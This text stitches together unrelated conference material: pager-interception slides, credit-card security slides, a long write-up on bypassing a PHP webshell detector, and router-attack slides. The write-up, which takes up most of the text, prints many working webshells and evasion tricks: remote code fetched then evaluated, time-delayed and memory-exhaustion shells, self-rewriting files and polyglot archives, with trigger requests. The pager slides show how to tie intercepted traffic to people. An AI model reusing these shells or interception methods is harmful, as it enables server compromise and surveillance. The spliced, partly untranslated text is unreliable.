What exactly the data slicer does… kinda like a modem and it decodes
FSK…
Note:
Lvl 2 is also known as a hamcomm
16
NYCMIKE
Setting Up the “Station”
Level 2 Level 4
http://wiki.radioreference.com/index.php/Data_Slicers
17
NYCMIKE
Setting Up the “Station”
Ethics
More or less don’t be a dumb ass.
18
NYCMIKE
Operations
FCC ULS: Know what you are hearing.
POCSAG (512, 1200, 2400)
- Post Office Code Standardization Advisory Group
FLEX (1600, 3200 lvl 2/3200, 6400 lvl 4)
Scanning the bands using a Band Scope
Audio from http://www.kb9ukd.com/digital/
The ULS DB is grand but its only for the initial search.
Get to know the signals by ear its best when your looking for a solid signal.
The Band Scope will show you activity near the freq you are on.
19
NYCMIKE
Operations
Walk thru of the ULS database
Main page
20
NYCMIKE
Operations
21
NYCMIKE
Operations
CD - Paging and Radiotelephone
CP - Part 22 VHF/UHF Paging (excluding 931MHz)
22
NYCMIKE
Operations
CD - Paging and Radiotelephone
23
NYCMIKE
Radio Sexy
Operations
Getting to know an interface (PCR-1000).
24
NYCMIKE
Operations
6K VS 50K: 6k just isn’t wide enough
for most text
Once I have the freq that I will be monitoring I’ll switch the bandwidth from
15k to 50k on NFM.
25
NYCMIKE
Example of an off freq capture or wrong bandwidth setting…
Operations
If the bandwidth isn’t correct or if the signal isn’t clear enough you’ll end up
with garbled data.
26
NYCMIKE
Operations
Laws:
Communications Act of 1934
ECPA of 1986
27
NYCMIKE
Analyze
1687XX6
AMKC
GRVC
MESSAGE
SEARCH
Collection Collection and did I mention Collection?
Collection?.
CAPCODES
SEARCHING
The idea is gather data to get actionable information or information of
interest. As with any sort of collection
there needs to be strong set of ethics lad down first. This data is in the
clear but none the less it shouldn’t be
abused that’s not the point or is it?
28
NYCMIKE
Analyze
“Get to know the Capcodes”
“Get to know the abbreviations”
Example: Looking more into this “AMKC”
After establishing a history of traffic “get to know the capcodes”
Create an archive then go through the logs and disseminate the data e.g..
AMKC/GRVC, then run them through an internet resource.
29
NYCMIKE
AMKC equates to Anne M. Kross Center…
Analyze
BAM… we found it, now you may want to go one step further and look for a
inmate support forum (Spouses, girl friends, boy friends of inmates at
Rikers Island have a forum).
30
NYCMIKE
Teleconferences:
In the logs its just a phone number.
Analyze
The conf bridges seem to be semi-trusted environments. Persons in the
room have no real qualms sharing information, why would they, you need a
temp login… sure why not you’re suppose to be here remember.
31
NYCMIKE
Concerns
Quality & Quantity
Possible Damaging Scenarios
Who can listen/watch traffic:
EVERYONE
Is that corporate weekly management meeting on the teleconference safe?
We are only as strong as our weakest link.
32
NYCMIKE
Concepts
Mobile Units:
Mobile leech aka Ghetto beeper buster
A mail able unit ?
$ 7 thrift store briefcase OR FREE flat rate box
IED??? That is obviously a real concern, but the step doesn’t have to
include the table top scanner… I just think it looks sexier.
PCR-1000 with serial interface to a palm pilot
33
NYCMIKE
Concepts
Reprogramming inactive pagers with active Cap Codes.
Swapping out the crystals
NYCMIKE
Utilizing online radio sharing communities
How does it work?
Concepts
34
35
NYCMIKE
Concepts
Decoding digital signals off of online communities like: www.globaltuners.com
Used to be dxtuners.com
36
NYCMIKE
Concepts
Most if not all use the line out off the radio in this community, therefore
without the base band I’m going no where BUT it should be do able if setup
correctly ( on the pcr 1000 it has a “packet radio” jack which happens to be a
discriminator tap. The site also offers different sound qualities:
Low quality: 16kbit CBR mono 11.025kHz
Medium quality: 32kbit CBR mono 22.050kHz
High quality: 32-128kbit VBR mono 44.100kHz
NYCMIKE
Wrapping Up
Garbage in will result in garbage out BUT if the radio on the far end is setup correctly the idea can and will work…
37
38
NYCMIKE
Q&A, which is different than T&A
IF TIME ALLOWS
OR
FIND ME AFTER
Thank you for looking at the slides. | pdf |
Credit Cards: Everything You have
Ever Wanted to Know
Robert “hackajar” Imhoff-Dousharm
A brief History
● 1950 DinersClub
● 1958 American Express
● 1958 BankAmericard (Visa)
● 1966 MasterCard International (ICA)
● 1986 Discover Card
Technology
● Knuckle Buster's
● Dial-Up Authorization Terminal
● High Speed Leased Lines
● Gateway Processor's
● Co-op Leased Lines
● Online API Gateways
Marketing & Technology
● Smart Cards
● Virtual One Time Use Cards
● Gift Cards
● Secure Cards
● Easy Pay RFID Cards
Physical Fraud Features
● Embossed Card Number
● Card Vendors Logo
● Card Vendors Hologram
● Card Vendors Embossed Cursive Letter
● First 4-digits non-embossed
● Expiration Date
● Magnetic Strip
● Signature Panel
● CVV2 Code
Credit Card Magnet Data
● 2 Tracks used for credit cards
● 3rd Track used for meta data, non credit cards
● Review of Tracks 1 & 2
Transaction Flow - Authorization
● Initial Authorization
● FEP Hand Off
● Back End / Merchant Link
● Issuing Bank Authorization
● FEP Record Update
● Terminal Signature Printout
Transaction Flow - Settlement
● Close Out Terminal
● Send Closeout request to FEP
● Send Totals, individual transactions, Totals
● FEP Record Update
● FEP Batch Close to Issuing Banks
● Money is “Settled” to MSP
● MSP Funds Merchant
Data Storage
● Grab ass with your personal data
● Known sources of data storage
● Possible sources data may be stored
● Extent of Information Stored
● High Risk Merchants (for information leakage)
● Internet Merchants
Questions & Answers
● All questions accepted on topics covered from
last three DefCon talks
● Some topics NOT covered during main talk,
reserved for you to ask here
● Thank You for 3 great years of Credit Card
Security Talks | pdf |
HIDS PHP WebShell Bypass: Research and Analysis
—— do9gy
Background: In the spring of 2022 I took part in a HIDS bypass challenge whose task happened to be PHP WebShell evasion. With the help of fuzzing I obtained a few samples that managed to slip through, and under the theme of #WebShell detection I would like to share them here.
The challenge rules were as follows:
1. A WebShell means arbitrary code or commands can be executed with externally controlled parameters (e.g. via GET/POST/HTTP headers), such as eval($_GET[1]);. A file with a hard-coded command does not count as a shell and is judged invalid, e.g. <?php system('whoami');
2. For each sample that bypasses the detection engine, a complete working curl invocation must be supplied, e.g. curl 'http://127.0.0.1/webshell.php?1=system("whoami")';. The invocation can be written and tested in the provided docker image; the address may be the container IP or 127.0.0.1, the file name is arbitrary, and executing whoami serves as the example command.
3. The WebShell must be generic: during review the submitted content is pulled into an environment identical to the validation image, and if it does not run normally there it is judged invalid.
4. When validating a payload, the WebShell file name is randomized; samples that cannot execute successfully in one shot and trigger reliably are judged invalid.
First, I made some guesses about the detection engines. According to the description there are two engines working simultaneously; as long as either one flags a sample, the verdict is malicious. Experience suggested one static engine and one dynamic engine. The static engine can be bypassed by splitting keywords, inserting malformed characters that confuse parsing, and so on; for the dynamic engine you have to work out which input points it tracks, how it follows variables, and in which functions and arguments it finally matches its malicious-sample rules. With that, I started experimenting.
0x01 Introducing parameters via cURL
Analysis showed that the engine filters practically every global that can carry user input — $_GET, $_POST, $_COOKIE, $_REQUEST, $_FILES, $_SERVER, $GLOBALS — but content fetched through curl receives no filtering at all, so parameters can be introduced via cURL.
<?php
$url = "http://x/1.txt";
$headerArray = array();
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headerArray);
$output = curl_exec($ch);
curl_close($ch);
echo $output;
eval($output);
This point proved contentious, however, and the sample was sadly dismissed. Under the challenge rules, being able to introduce parameters dynamically should be enough, and in my view parameters brought in via cURL are externally controllable content.
0x02 Introducing parameters via get_meta_tags
The get_meta_tags function parses the meta tags at a given URL, which naturally issues a URL request. For a server that can make outbound connections, this PHP WebShell sample is highly deceptive.
Since the cURL sample had already been dismissed, though, I never submitted this one.
<?php
get_meta_tags("http://x/1")["author"](get_meta_tags("http://x/1")["
keywords"]);
?>
At this point the target server needs a matching file in place:
<meta name="author" content="system">
<meta name="keywords" content="ls">
By dynamically changing the content of that file's second line, different arguments can be passed to system — the argument content is fully controllable.
0x03 Introducing parameters via fpm_get_status
The contest environment uses the php-fpm architecture, so parameters can be obtained through the fpm_get_status() function. For debugging it can be printed:
<?php
var_dump(fpm_get_status());
From this, a sample is constructed:
<?php
system(fpm_get_status()["procs"][0]["query-string"]);
However, there is no guarantee that the current process always sits in first position, so although my first submission was short, it failed the rule requiring one-shot success and reliable triggering. I later extended the sample:
<?php
foreach(fpm_get_status()["procs"] as $val){
system($val["query-string"]);
}
But in the gap before this fix went in, someone else had already submitted the same payload, so it was dismissed once again.
0x04 Introducing parameters via recursive GLOBALS
Testing showed that the engine does inspect $GLOBALS as a parameter entry point, but it apparently does not recurse strictly, so a few mutations get past it:
<?php
$m=($GLOBALS[GLOBALS]*n[GLOBALS][GLOBALS][GLOBALS][GLOBALS][GLOBALS][_GET][b]);
substr(timezone_version_get(),2)($m);
Because the static engine blocks system( outright, some wrapping was applied: in the given test environment, timezone_version_get() happens to return 0.system.
On this point, I came across the following passage on the PHP website:
If you get 0.system for the version, this means you have the version that PHP shipped
with. For a newer version, you must upgrade via the PECL extension (sudo pecl install
timezonedb)
That is about all I found on the parameter-entry side. Next, I tried to sever the dynamic engine's taint-tracking chain through unusual ways of passing variables.
0x05 Pattern one: array element references
<?php
$b = "111";
$c = "222";
if(get_cfg_var('error_reporting')>0){
$b="#";
}
$a = array( "one"=>$c,"two"=>&$c );
$url = "http://a/usr/".$b."?a=1";
$d =parse_url($url);
if($d['query']){
$c="echo 111;";
}
else{
$c=$_FILES['useraccount']['name'];
}
var_dump($a["two"]);
eval($a["two"]);
?>
After countless rounds of fuzzing, I finally worked out some of the dynamic engine's detection logic: no matter how values are concatenated, mutated, or reassigned, the pattern [dangerous function]([controllable argument]) must never appear anywhere in the PHP script's lifetime.
My first thought was to use variable references to sever the tracking chain.
Traditional variable passing looks like $b=$a; $c=$b; $d=$c;
A tracker can certainly follow the relationship between $a and $d and cleanly resolve their values.
So what about $a="foo";$b=&$a; $b="system"; $a(xxx);? This is a small upgrade: if the engine only tracks plain assignments, it will easily lose the trail. Testing showed the engine is extremely sensitive to direct reference passing of this kind, and no payload could be built that way. So I wrapped it in an array instead, binding $c to $a["two"]:
$c = "222";
$a = array( "one"=>$c,"two"=>&$c );
Now, whenever $c changes, $a["two"] changes with it:
$c=$_FILES['useraccount']['name'];
var_dump($a["two"]);
Testing also showed the engine does not treat the user-controllable globals equally — they carry different maliciousness levels. $_GET, $_POST, $_COOKIE, and $_REQUEST sit at the highest level, while $_FILES scores lower, so $_FILES can be used here to receive the user's input.
Cutting the chain alone was still not enough, so I moved the decision over the argument's value forward. In short: $c=$a==$b?'system':'foo'; lets $a==$b decide whether the sample ends up a WebShell or an ordinary file. I first arranged for $a==$b to return false, and the sample passed detection; when it was true, the verdict flipped to malicious — exactly what I wanted.
Next, I tried PHP syntax tricks to create parsing discrepancies, e.g. intval((0.1+0.7)*10) == 7. Testing showed the dynamic engine itself runs PHP, so no discrepancy arises. I then brought in tricks specific to particular PHP 7 versions and still could not cause one, gradually confirming that the engine's PHP version matches the test environment.
That left environmental factors as the only way to cause divergence. Before this point, I laid down one more domino to confuse the tracker further:
$url = "http://a/usr/".$b."?a=1";
$d =parse_url($url);
if($d['query']){
$c="echo 111;";
}
else{
$c=$_FILES['useraccount']['name'];
}
解析 URL 成功与否,将直接导致 $c 的赋值,而这一切又取决于 $b :
if(get_cfg_var('error_reporting')>0){
$b="#";
}
$b 如果等于 # , 将导致解析 URL 失败,我将是否推动多米诺骨牌第一块的这只手交给
get_cfg_var('error_reporting') ,我本地环境是配置了这个参数的,而我相信动态
查杀引擎没有配置,事实正如我所料。这一点的不一致,导致了最终的绕过。
根据这一模式,引申出来的绕过点有很多,不一一列举了,在 PhpStorm 中输入 get_即
可看到:
0x06 模式二: 反序列化引用
怎么能少得了反序列化呢?记得在 N 年前 php4fun 挑战赛 challenge8 中,一道与 L.N.
师傅有关的题令我印象深刻,其中使用的技术正是 PHP 反序列化引用。
<?php
$s=
unserialize('a:2:{i:0;O:8:"stdClass":1:{s:1:"a";i:1;}i:1;r:2;}');
$c = "123";
$arr= get_declared_classes();
$i=0;
for($i;$i<count($arr);$i++){
$i++;
$s[1]->a=$_GET['a'];
if($i<97 || $i>=98){
continue;
}
$c=$s[0]->a;
print(substr(get_declared_classes()[72],4,6)($c));
}
?>
Through deserialization, the two array elements $s[0] and $s[1] are bound together, which disrupts the engine's dynamic taint tracking. Drawing on that old challenge, two member variables of a stdClass object can likewise be bound together for even greater deception.
The other trigger points are much the same as in pattern one, so I will not go into them.
Combined with different divergence-inducing environment variables and different parameter entry points, these two patterns can spawn many payload variants, which I will not enumerate here.
0x07 trait
While fuzzing the first two patterns, I found a new angle. Although it likewise depends in part on a system environment variable, both the executing function and the argument are transformed, which effectively blocks taint tracking.
<?php
trait system{
}
$a= new JsonException($_GET['a']);
$c = "123";
$arr= getmygid();
$i=0;
for($i;$i<$arr;$i++){
$i++;
if($i<115 || $i>=116){
continue;
}
$c=$a->getMessage();
print(get_declared_traits()[0]($c));
}
get_declared_traits 将会获取到系统中已定义的 trait,因此获取到的函数名称为
system,而 JsonException ->getMessage() 能够将已储存的 Message 信息显示出来,
这里我如此初始化:$a= new JsonException($_GET['a']); 于是,分别从危险函数和
用户传参两个路径来狙击动态跟踪,发生了新的绕过。除了 JsonException 以外,我发现
引擎对内置接口的 getMessage 普遍不敏感,这样的内置类大致(未严格测试,其中可能
会有些类不支持 getMessage 方法)如下:
Error
ArithmeticError
DivisionByZeroError
AssertionError
ParseError
TypeError
ArgumentCountError
Exception
ClosedGeneratorException
DOMException
ErrorException
IntlException
LogicException
BadFunctionCallException
BadMethodCallException
DomainException
InvalidArgumentException
LengthException
OutOfRangeException
PharException
ReflectionException
RuntimeException
OutOfBoundsException
OverflowException
PDOException
RangeException
UnderflowException
UnexpectedValueException
SodiumException
0x08 SESSION
If the dynamic engine goes to inspect the sample, it should have no SESSION — at least not on the first run.
<?php
$b = "111";
$c = "222";
session_start();
$_SESSION['a']="#";
$a = array( "one"=>$c,"two"=>&$c );
$url = "http://a/usr/".$_SESSION['a']."?a=1";
$d =parse_url($url);
if($d['query']){
$c="echo 111;";
}
else{
$c=$_FILES['useraccount']['name'];
}
var_dump($a["two"]);
eval($a["two"]);
?>
模式基本上是与之前相同的,不同之处在于引入了 SESSION 变量来干扰 URL 解析,不
知为何,这样一次就通过了检测。其实更加高级的方法应该是这样的:
<?php
$b = "111";
$c = "222";
session_start();
$a = array( "one"=>$c,"two"=>&$c );
$url = "http://a/usr/".$_SESSION['a']."?a=1";
$d =parse_url($url);
if($d['query']){
$c="echo 111;";
}
else{
$c=$_FILES['useraccount']['name'];
}
var_dump($a["two"]);
eval($a["two"]);
$_SESSION['a']="#";
?>
由于规则需要一次性执行成功,因此需要在文件末尾加入:
if ($_SESSION['a']!="#"){
$_SESSION['a']="#";
print(1);
include(get_included_files()[0]);
}
The HTTP request that triggers this WebShell:
POST /x.php HTTP/1.1
Host: x
Content-Type: multipart/form-data;boundary=a;
Content-Length: 101
Cookie: PHPSESSID=bkukterqhtt79mrso0p6ogpqtm;
--a
Content-Disposition: form-data; name="useraccount"; filename="phpinfo();"
phpinfo();
--a--
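The request above can also be generated programmatically. Below is a small stdlib-Python sketch of the multipart body that smuggles the PHP payload through the filename field; the boundary and field name mirror the request shown, and delivery (curl, a raw socket, etc.) is left to the reader:

```python
def build_multipart(payload, boundary="a", field="useraccount"):
    """Build the multipart/form-data body that delivers `payload` via
    $_FILES['useraccount']['name'] (the filename) on the PHP side."""
    body = (
        "--{b}\r\n"
        'Content-Disposition: form-data; name="{f}"; filename="{p}"\r\n'
        "\r\n"
        "{p}\r\n"
        "--{b}--\r\n"
    ).format(b=boundary, f=field, p=payload)
    return body.encode()
```

Because the payload rides in the filename, it reaches PHP through the lower-scrutiny $_FILES superglobal discussed in pattern one.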
0x09 SESSION handler extension
Using the SessionHandlerInterface interface, a chosen function can be executed without anyone noticing — straight to the code:
<?php
ini_set("display_errors",1);
class MySessionHandler implements SessionHandlerInterface
{
// implement interfaces here
public function close()
{
// TODO: Implement close() method.
}
public function destroy($id)
{
// TODO: Implement destroy() method.
}
public function gc($max_lifetime)
{
// TODO: Implement gc() method.
}
public function open($path, $name)
{
$path($name);
}
public function read($id)
{
// TODO: Implement read() method.
}
public function write($id, $data)
{
// TODO: Implement write() method.
}
}
$handler = new MySessionHandler();
session_set_save_handler($handler, true);
session_name($_GET[a]);
session_save_path('system');
session_start();
0x0A Memory
I had considered writing a file and then include-ing it, but the rules blocked that; even including the session file was disallowed. So I turned to memory.
<?php
$a = new SplTempFileObject(1000000);
$a->fwrite( $_GET['a']);
$a->rewind();
substr(get_declared_classes()[72],4,6)($a->fgets());
?>
According to the PHP documentation: if maxMemory is set (default 2 MB), the SplTempFileObject stays in memory, so no file ever touches disk; the payload is written to memory and then loaded.
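The stay-in-memory-until-a-threshold behavior can be illustrated with Python's `tempfile.SpooledTemporaryFile` (an analogy for the PHP mechanism, not the mechanism itself; `_rolled` is a CPython implementation detail used here only to observe the spill):

```python
import tempfile

# Data smaller than max_size lives purely in memory; nothing touches disk
f = tempfile.SpooledTemporaryFile(max_size=1000)
f.write(b"payload")
in_memory = not f._rolled          # CPython detail: _rolled flips once data spills to disk
f.write(b"x" * 2000)               # exceeding max_size rolls over to a real temp file
spilled = f._rolled
f.seek(0)
content = f.read()
```

The same trade-off applies: as long as the written payload stays under the threshold, a disk-scanning detector sees nothing.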
0x0B Self-Modification
All self-modifying shells were classified as the same bypass technique, and someone had already submitted one first, so this one was dismissed; I still write it up here for reference.
<?php
$s="Declaring file object\n";
$d=$_SERVER['DOCUMENT_ROOT'].$_SERVER['DOCUMENT_URI'];
$file = new SplFileObject($d,'w');
$file->fwrite("<?php"." eva".$s[3]);
$file->fwrite("(\$_"."GET"."[a]);?>");
include(get_included_files()[0]);
?>
Direct file read/write functions are banned, so SplFileObject is used for writing. Since the shell must execute in one pass and trigger reliably, it includes itself right after writing. This kind of WebShell is fun: a wolf in sheep's clothing that looks unremarkable on upload and transforms completely after a single execution.
Following the same idea, there is another spot where a file can be written:
<?php
ini_set("display_errors",1);
print "Declaring file object\n";
$f=__FILE__;
$file = new SplFileObject($f,'w');
$a=array("<?php /*", "*/eva","(\$_GET[a]);");
$file->fputcsv($a,'l');
$file=null;
include(get_included_files()[0]);
?>
The difference is that fputcsv is used here, so the delimiter characters produced on write must be commented out, which takes some care when constructing the payload.
Going one step further, the same method can also load from a cache file:
<?php
ini_set("display_errors",1);
$s="Declaring file objecT\n";
$file = new SplTempFileObject();
$file->fputcsv(explode('m',"evam(\$_GET[m]);"),'l');
$file->rewind();
eval($file->fgets());
?>
This, however, was judged a duplicate of the memory technique.
0x0C Heap Sort
The dynamic detection engine judges a sample by simulating its execution, so can we mix good and bad together? Picture a box holding 5 balls arranged by number from large to small and drawn in order: we make the engine draw the harmless balls, while at execution time a controlled parameter makes the ball that turns into a WebShell come out. I insert three harmless balls (0, 7, 8), one malicious ball 'system', and one ball controlled through a GET parameter, call it x.
When x is a number greater than 8, one max-heap results (green marks the order in which elements are extracted from the heap top).
When x is "a", another.
And when x is "99;ls", a third.
So different parameter values change the heap structure. After repeated fuzzing I found that the HIDS engine did not account for the third case, so I take i == 1 and i == 2 in turn to extract the variables $a and $b, then execute the command via $a($b);.
Of course, in this scenario the payload must take the form x.php?a=99;whoami.
<?php
$obj=new SplMaxHeap();
$obj->insert( $_GET[a] );
$obj->insert( 8 );
$obj->insert( 'system' );
$obj->insert( 7 );
$obj->insert( 0 );
//$obj->recoverFromCorruption();
$i=0;
foreach( $obj as $number ) {
$i++;
if($i==1) {
$a = $number;
}
if($i==2) {
$b = $number;
}
}
$a($b);
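How sensitive the extraction order is to a single controlled value can be sketched in Python (`heapq` is a min-heap, so values are negated to emulate `SplMaxHeap`; PHP's loose string/number comparisons are not modeled here):

```python
import heapq

def extraction_order(values):
    # Negate so the min-heap pops the largest value first, like SplMaxHeap
    heap = [-v for v in values]
    heapq.heapify(heap)
    return [-heapq.heappop(heap) for _ in range(len(values))]

# x > 8 keeps the attacker-controlled element at the top;
# a small x lets different elements surface first
order_big = extraction_order([99, 8, 7, 0])    # [99, 8, 7, 0]
order_small = extraction_order([3, 8, 7, 0])   # [8, 7, 3, 0]
```

The detection engine only simulates one ordering; the real request supplies a value that produces a different one.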
0x0D Priority Queue
The priority queue follows essentially the same idea as the heap sort, except that here the keyword system is split at a finer granularity, one character at a time, and the request parameter influences the order of each character.
See the sample:
<?php
ini_set("display_errors",1);
$objPQ = new SplPriorityQueue();
$objPQ->insert('m',1);
$objPQ->insert('s',6);
$objPQ->insert('e',3);
$objPQ->insert('s',4);
$objPQ->insert('y',5);
$objPQ->insert('t',$_GET[a]);
$objPQ->setExtractFlags(SplPriorityQueue::EXTR_DATA);
//Go to TOP
$objPQ->top();
$m='';
$cur = new ErrorException($_GET[b]);
while($objPQ->valid()){
$m.=$objPQ->current();
$objPQ->next();
}
echo $m($cur->getMessage());
?>
If the GET parameter is absent or 0, the resulting name is sysemt, not a dangerous function. But when $_GET['a'] is 3, the name becomes system, which is dangerous.
The exploitation payload for this sample: /x.php?a=3&b=whoami
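The character reassembly can be modeled in Python. This is a sketch: real `SplPriorityQueue` tie-breaking differs, so the attacker-controlled priority is taken as 3.5 here to sidestep the tie at priority 3:

```python
def assemble(t_priority):
    # Fixed priorities for every character except 't', which the attacker controls
    items = [("m", 1), ("s", 6), ("e", 3), ("s", 4), ("y", 5), ("t", t_priority)]
    # Extract in descending priority, like SplPriorityQueue with EXTR_DATA
    return "".join(ch for ch, p in sorted(items, key=lambda x: -x[1]))

benign = assemble(0)      # 'sysemt': not a callable danger
danger = assemble(3.5)    # 'system'
```

The scanner, running without the parameter, only ever sees the harmless spelling.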
0x0E Out of Memory
The idea behind the out-of-memory trick: the engine's dynamic execution consumes memory, and because many samples are processed concurrently, each sandbox usually gets only a small allocation. If a sample makes the engine abort early on memory exhaustion, while the real environment has enough memory to run it, the malicious code executes only on the real target. Conveniently, PHP's memory limit can be raised at runtime via ini_set.
See the sample:
<?php
ini_set("display_errors",1);
class b extends SplObjectStorage {
public function getHash($o) {
return get_class($o);
}
}
$cur= new DomainException($_GET[a]);
?>
111111111111111111111111111111111111111111111111
<?php
ini_set("display_errors",1);
ini_set("memory_limit","100G");
echo memory_get_usage().'<br>';
$var = str_repeat("php7_do9gy", 100000000);
echo memory_get_usage();
class bb{}?>
111111111111111111111111111111111111111111111111
<?php
ini_set("display_errors",1);
class A {}
$s = new b;
$o2 = new stdClass;
$s[$o2] = 'system';
//these are considered equal to the objects before
//so they can be used to access the values stored under them
$p1 = new stdClass;
echo $s[$p1]($cur->getMessage());
?>
The key section of the sample is:
<?php
ini_set("display_errors",1);
ini_set("memory_limit","100G");
echo memory_get_usage().'<br>';
$var = str_repeat("php7_do9gy", 100000000);
echo memory_get_usage();
This is expected to consume about 1 GB of memory; in my local tests it executed successfully.
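The 1 GB estimate follows directly from the repetition arithmetic (ignoring PHP's per-string overhead):

```python
# "php7_do9gy" is 10 bytes; repeated 100,000,000 times it yields 10^9 bytes
pattern = "php7_do9gy"
total_bytes = len(pattern) * 100_000_000   # 1,000,000,000 bytes, roughly 1 GB
```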
0x0F Future WebShell
Idea: dynamic detection executes a PHP file right after upload. Could we upload a file that is not yet a WebShell at upload time but turns into one a few minutes later, dodging the dynamic scan? Combining patterns 0x05 and 0x06, we push the WebShell-or-not decision into a leading if condition keyed on the current time: while the Unix timestamp is below a chosen value the file behaves benignly, so the engine marks it clean; once time passes, the behavior flips, and requesting the WebShell executes it.
I had long wanted to build such a future WebShell, but the site filtered time-related functions heavily, until I found the getTimestamp method of the DateTime class.
The idea alone is not enough; the implementation also combines reflection tricks and PHP's short-circuit condition evaluation.
<?php
ini_set("display_errors",1);
function foo($test, $bar = FSYSTEM)
{
echo $test . $bar;
}
$function = new ReflectionFunction('foo');
$q = new ParseError($_GET[a]);
foreach ($function->getParameters() as $param) {
$da = new DateTime();
echo $da->getTimestamp();
echo 'Name: ' . $param->getName() . PHP_EOL;
$n='F';
if ($param->isOptional()) {
if($da->getTimestamp()>=1648470471||$n='1'){
echo $n;
}
echo 'Default value: ' .
ltrim($param->getDefaultValueConstantName(),$n)($q->getMessage());
}
echo PHP_EOL;
}
?>
Design:
1. ParseError's getMessage carries the GET parameter.
2. ReflectionFunction reflects over foo, exposing the FSYSTEM default value.
3. ltrim strips the leftmost F; whether its second argument is 'F' or '1' directly determines the final function name.
4. if($da->getTimestamp()>=1648470471||$n='1') exploits short-circuit evaluation: in A || B, B is skipped when A holds. $da->getTimestamp()>=1648470471 stands in for time(), because the time function was filtered.
1648470471 corresponds to 2022-03-28 20:27:51. At scan time (20:26, before 20:27) it is not yet a WebShell; one minute later it is. It still executes successfully in one pass, you just have to wait a moment before that pass.
Usage: /x.php?a=ls
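The short-circuit time gate can be modeled in Python (a behavioral sketch of the PHP logic above, not the PHP code itself):

```python
def resolved_name(now, activation_ts=1648470471):
    name, strip_chars = "FSYSTEM", "F"
    # Emulates PHP's if ($ts >= activation || $n = '1'):
    # when the left side is false, the right side runs and reassigns $n
    if not (now >= activation_ts):
        strip_chars = "1"
    return name.lstrip(strip_chars)

before = resolved_name(1648470471 - 60)  # scan time: harmless undefined name
after = resolved_name(1648470471 + 60)   # one minute later: dangerous name
```

At scan time the resolver yields the nonexistent `FSYSTEM`; after the activation timestamp the leading `F` is stripped and the dangerous name emerges.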
0x10 Quantum WebShell
Not content with the future WebShell, I found yet another pattern: the quantum WebShell. While the PHP engine scans, a random number makes the condition fail in almost every run, so the file sits in a superposition of WebShell and non-WebShell. If and only if a request parameter narrows the random range does the condition hold deterministically; the sample then collapses into the WebShell state and triggers reliably.
See the code:
<?php
ini_set("display_errors",1);
function foo($test, $bar = FSYSTEM)
{
echo $test . $bar;
}
$function = new ReflectionFunction('foo');
$q = new ParseError($_GET[a]);
$p = new ParseError($_SERVER[HTTP_A]);
foreach ($function->getParameters() as $param) {
$da = new DateTime();
echo $da->getTimestamp();
echo 'Name: ' . $param->getName() . PHP_EOL;
$n='F';
if ($param->isOptional()) {
if(mt_rand(55,$p->getMessage()??100)==55||$n='1'){
echo $n;
}
echo 'Default value: ' .
ltrim($param->getDefaultValueConstantName(),$n)($q->getMessage());
}
echo PHP_EOL;
}
?>
The key point is:
mt_rand(55,$p->getMessage()??100)==55
In the critical check I use the random generator mt_rand (because rand was filtered), and its range can be controlled through an HTTP request header: sending a: 55 pins the range and guarantees the condition holds.
Usage:
GET /bbb/2.php?a=whoami HTTP/1.1
Host: aaa.com:955
a: 55
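The range collapse is easy to verify in Python, with `random.randint` standing in for `mt_rand` (both are inclusive on each end):

```python
import random

def condition(header_value=None):
    upper = int(header_value) if header_value is not None else 100
    # mt_rand(55, $upper) == 55: with upper pinned to 55 the range is a single value
    return random.randint(55, upper) == 55

pinned = all(condition("55") for _ in range(1000))  # deterministic once pinned
```

Without the header the check passes only about 1 time in 46, which is why the scanner almost never observes the malicious branch.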
0x11 Polyglot File
This idea came from a foreign CTF challenge forwarded by 朽木自雕 in the "Code Audit" knowledge planet: build one file that is simultaneously a PDF, a WAV, and a TAR. After a day of analysis I solved it and learned a great deal, which raised the question: can one file be both a PHP file and a zip file? The answer is yes. Look at the file:
The PHP code is a single line that loads the s.t entry from the zip side of this very file. Where is s.t? Inside the archive. I zipped the malicious s.t and spliced its hex contents onto both ends of the one-liner; note that two copies must be pasted, one at each end, or extraction may fail.
Testing showed s.t cannot itself be a plain PHP one-liner, or HIDS flags it, so s.t was also transformed a little. s.t:
<?php
trait system{
}
get_declared_traits()[0]($_GET['a']);
Since the given environment had no PHP extensions at all, I used the native phar wrapper to load it.
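The PHP/zip polyglot works because zip readers locate the end-of-central-directory record from the tail of the file and tolerate prepended data. A Python sketch of the same property (the entry name `s.t` mirrors the writeup):

```python
import io
import zipfile

# Build a tiny archive containing the payload entry
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("s.t", "payload")

# Prepend arbitrary (e.g. PHP) bytes; the archive still parses,
# because the central directory is located by searching from the end
polyglot = b"<?php /* one-liner */ ?>" + buf.getvalue()
with zipfile.ZipFile(io.BytesIO(polyglot)) as z:
    recovered = z.read("s.t")
```

A PHP interpreter sees the leading script; a zip parser sees the trailing archive. The same file satisfies both.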
0x12 Phar Deserialization
Extending the single-file, multiple-types idea, I pushed it further into Phar deserialization, mainly to evade the include-focused detection most HIDS perform. The idea comes from Sam Thomas's BlackHat 2018 talk: while parsing a phar-format file, the engine calls phar_parse_metadata() on the metadata, which in turn calls php_var_unserialize(), yielding a deserialization vulnerability.
Since the code contains compressed data, I present it as a screenshot.
The phar file is generated as follows:
<?php
ini_set('display_errors',1);
class Test{
public $test="test";
}
@unlink("test.phar");
$phar = new Phar("test.phar"); // the extension must be phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); // set the stub
$o = new Test();
$phar->setMetadata($o); // store the custom meta-data in the manifest
$phar->addFromString("test.txt", "test"); // add the file to be archived
$phar->stopBuffering(); // the signature is computed automatically
var_dump($phar->getSignature());
In the same way, the Phar's binary data is appended to the end of the file after construction. The difference is that Phar files carry a signature check, so the spliced file fails verification; the signature must be recomputed and patched by hand, which is left as an exercise for the reader.
How to Hack Millions of Routers
Craig Heffner, Seismic LLC
SOHO Router…Security?
Common Attack Techniques
Cross Site Request Forgery
No trust relationship between browser and router
Can’t forge Basic Authentication credentials
Anti-CSRF
Limited by the same origin policy
DNS Rebinding
Rebinding prevention by OpenDNS / NoScript / DNSWall
Most rebinding attacks no longer work
Most…
Multiple A Record Attack
Better known as DNS load balancing / redundancy
Return multiple IP addresses in DNS response
Browser attempts to connect to each IP addresses in order
If one IP goes down, browser switches to the next IP in the list
Limited attack
Can rebind to any public IP address
Can’t rebind to RFC1918 IP addresses
